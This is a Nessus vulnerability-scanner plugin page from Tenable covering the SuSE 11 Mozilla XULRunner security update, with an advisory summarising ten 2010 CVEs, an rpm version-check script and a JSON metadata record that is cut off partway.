ID SUSE_11_MOZILLA-XULRUNNER191-101118.NASL Type nessus Reporter Tenable Modified 2013-11-27T00:00:00
Description
This update brings the Mozilla XULRunner engine to version 1.9.1.15, fixing various bugs and security issues.
The following security issues were fixed :
Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)
Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.
Memory safety bugs - Firefox 3.6, Firefox 3.5
Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)
Memory safety bugs - Firefox 3.6
CVE-2010-3175
Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)
Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)
Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.lookupGetter is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)
Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)
Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.
(MFSA 2010-69 / CVE-2010-3178)
Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)
Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.
(MFSA 2010-71 / CVE-2010-3182)
Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SuSE 11 update information. The text itself is
# copyright (C) Novell, Inc.
#
if (NASL_LEVEL < 3000) exit(0);
include("compat.inc");
if (description)
{
script_id(50952);
script_version("$Revision: 1.14 $");
script_cvs_date("$Date: 2013/11/27 17:11:05 $");
script_cve_id("CVE-2010-3170", "CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183", "CVE-2010-3765");
script_name(english:"SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote SuSE 11 host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"This update brings the Mozilla XULRunner engine to version 1.9.1.15,
fixing various bugs and security issues.
The following security issues were fixed :
- Mozilla developers identified and fixed several memory
safety bugs in the browser engine used in Firefox and
other Mozilla-based products. Some of these bugs showed
evidence of memory corruption under certain
circumstances, and we presume that with enough effort at
least some of these could be exploited to run arbitrary
code. References. (MFSA 2010-64)
Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor
Bukanov and Josh Soref reported memory safety problems
that affected Firefox 3.6 and Firefox 3.5.
- Memory safety bugs - Firefox 3.6, Firefox 3.5
- Gary Kwong, Martijn Wargers and Siddharth Agarwal
reported memory safety problems that affected Firefox
3.6 only. (CVE-2010-3176)
- Memory safety bugs - Firefox 3.6
- CVE-2010-3175
- Security researcher Alexander Miller reported that
passing an excessively long string to document.write
could cause text rendering routines to end up in an
inconsistent state with sections of stack memory being
overwritten with the string data. An attacker could use
this flaw to crash a victim's browser and potentially
run arbitrary code on their computer. (MFSA 2010-65 /
CVE-2010-3179)
- Security researcher Sergey Glazunov reported that it was
possible to access the locationbar property of a window
object after it had been closed. Since the closed
window's memory could have been subsequently reused by
the system it was possible that an attempt to access the
locationbar property could result in the execution of
attacker-controlled memory. (MFSA 2010-66 /
CVE-2010-3180)
- Security researcher regenrecht reported via
TippingPoint's Zero Day Initiative that when
window.__lookupGetter__ is called with no arguments the
code assumes the top JavaScript stack value is a
property name. Since there were no arguments passed into
the function, the top value could represent
uninitialized memory or a pointer to a previously freed
JavaScript object. Under such circumstances the value is
passed to another subroutine which calls through the
dangling pointer, potentially executing
attacker-controlled memory. (MFSA 2010-67 /
CVE-2010-3183)
- Google security researcher Robert Swiecki reported that
functions used by the Gopher parser to convert text to
HTML tags could be exploited to turn text into
executable JavaScript. If an attacker could create a
file or directory on a Gopher server with the encoded
script as part of its name the script would then run in
a victim's browser within the context of the site. (MFSA
2010-68 / CVE-2010-3177)
- Security researcher Eduardo Vela Nava reported that if a
web page opened a new window and used a javascript: URL
to make a modal call, such as alert(), then subsequently
navigated the page to a different domain, once the modal
call returned the opener of the window could get access
to objects in the navigated window. This is a violation
of the same-origin policy and could be used by an
attacker to steal information from another web site.
(MFSA 2010-69 / CVE-2010-3178)
- Security researcher Richard Moore reported that when an
SSL certificate was created with a common name
containing a wildcard followed by a partial IP address a
valid SSL connection could be established with a server
whose IP address matched the wildcard range by browsing
directly to the IP address. It is extremely unlikely
that such a certificate would be issued by a Certificate
Authority. (MFSA 2010-70 / CVE-2010-3170)
- Dmitri Gribenko reported that the script used to launch
Mozilla applications on Linux was effectively including
the current working directory in the LD_LIBRARY_PATH
environment variable. If an attacker was able to place
into the current working directory a malicious shared
library with the same name as a library that the
bootstrapping script depends on the attacker could have
their library loaded instead of the legitimate library.
(MFSA 2010-71 / CVE-2010-3182)
- Morten Kråkvik of Telenor SOC reported an
exploit targeting particular versions of Firefox 3.6 on
Windows XP that Telenor found while investigating an
intrusion attempt on a customer network. The underlying
vulnerability, however, was present on both the Firefox
3.5 and Firefox 3.6 development branches and affected
all supported platforms. (MFSA 2010-73 / CVE-2010-3765)"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=653606"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3170.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3175.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3176.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3177.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3178.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3179.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3180.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3182.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3183.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2010-3765.html"
);
script_set_attribute(
attribute:"solution",
value:"Apply SAT patch number 3557 / 3558 as appropriate."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");
script_set_attribute(attribute:"patch_publication_date", value:"2010/11/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/02");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11");
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", cpu);
flag = 0;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"mozilla-xulrunner191-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"mozilla-xulrunner191-translations-1.9.1.15-0.5.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "SUSE_11_MOZILLA-XULRUNNER191-101118.NASL", "bulletinFamily": "scanner", "title": "SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)", "description": "This update brings the Mozilla XULRunner engine to version 1.9.1.15, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "published": "2010-12-02T00:00:00", "modified": "2013-11-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=50952", "reporter": "Tenable", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html", "https://bugzilla.novell.com/show_bug.cgi?id=653606"], "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "type": "nessus", "lastseen": "2018-09-01T23:41:58", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs"], "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This update brings the Mozilla XULRunner engine to version 1.9.1.15, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "edition": 2, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}}, "hash": "d17e8137ecf03951529888f90853932a3c71f95e6b10ab730c48e924d4cd382f", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c9be8c76b09668e68564aafc37499eff", "key": "references"}, {"hash": "a8e55707958b4a0e640ad83a3e69d853", "key": "cpe"}, {"hash": "65fe2a93d43070603e05e87f85db8f43", "key": "title"}, {"hash": "96ffa3e5f217475f603a12d5cccf94fe", "key": "href"}, {"hash": "0d10e29d75af6551e75c87d10169a1d2", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "d14d1a96b91092c41434a96e62b67fa1", "key": "published"}, {"hash": "16dfb1899bc96767b30ee77a130bcfbb", "key": "description"}, {"hash": "5b6f3fc076a2d9c6f98e81620afdb872", "key": "modified"}, {"hash": "0b19968aa0d749fbb88c80abb37d3520", "key": "cvelist"}, {"hash": "350fe642a6bd00b9726ef9b638f591f0", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=50952", "id": "SUSE_11_MOZILLA-XULRUNNER191-101118.NASL", "lastseen": "2017-10-29T13:36:41", "modified": "2013-11-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "50952", "published": "2010-12-02T00:00:00", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html", "https://bugzilla.novell.com/show_bug.cgi?id=653606"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50952);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the Mozilla XULRunner engine to version 1.9.1.15,\nfixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been 